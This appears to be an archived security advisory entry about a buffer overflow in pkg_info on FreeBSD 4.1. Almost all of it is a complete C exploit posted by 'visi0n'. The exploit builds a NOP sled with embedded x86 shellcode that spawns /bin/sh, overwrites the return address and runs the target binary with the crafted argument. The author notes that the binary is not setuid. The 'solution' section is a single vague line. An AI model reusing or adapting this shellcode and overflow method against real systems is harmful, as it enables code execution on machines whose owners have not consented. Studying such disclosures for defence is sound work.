COMMAND
	    pkginfo
SYSTEMS AFFECTED
	    FreeBSD 4.1
PROBLEM
	    'visi0n' posted following.
	
	    /*
	     *	FreeBSD 4.1 x86 pkg_info exploit.
	     *	anthrax# ./AUX-pkg_info 4301 2000
	     *	Author: visi0n.
	     *	AUX TECHNOLOGIES BRASIL.
	     *	Comments: This is for fun, because pkg_info isnt suid.
	     */
	    #include <stdio.h>
	    #include <string.h>
	    #define OFFSET			0
	    #define BUFFER_SIZE		4301
	    #define NOP			0x90
	    char shellcode[]=
	    "\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76"
	    "\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b"
	    "\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff"
	    "\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff"
	    "\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02"
	    "\x02\x02\x02/bin/sh.-c.sh";
	    unsigned long get_esp()
	    {
		    __asm__("movl %esp,%eax");
	    }
	    void main(int argc, char *argv[])
	    {
		    char *buff, *ptr;
		    long *addr_ptr, addr;
		    int offset = OFFSET, bsize = BUFFER_SIZE;
		    int i;
		    if (argc > 1) bsize = atoi(argv[1]);
		    if (argc > 2) offset = atoi(argv[2]);
		    buff = malloc(bsize);
		    addr = get_esp() - offset;
		    printf("0x%x\n", addr);
		    ptr = buff;
		    addr_ptr = (long *)ptr;
		    for (i = 0; i < bsize; i += 4)
			    *(addr_ptr++) = addr;
		    for (i = 0; i < bsize/2; i++)
			    buff[i] = NOP;
		    ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
		    for (i = 0; i < strlen(shellcode); i++)
			    *(ptr++) = shellcode[i];
		    buff[bsize -1] = '\0';
		    printf("%d\n", strlen(buff));
		    execl("/usr/sbin/pkg_info", "pkg_info", buff, 0);
	    }
	
SOLUTION
	    It should be fixed.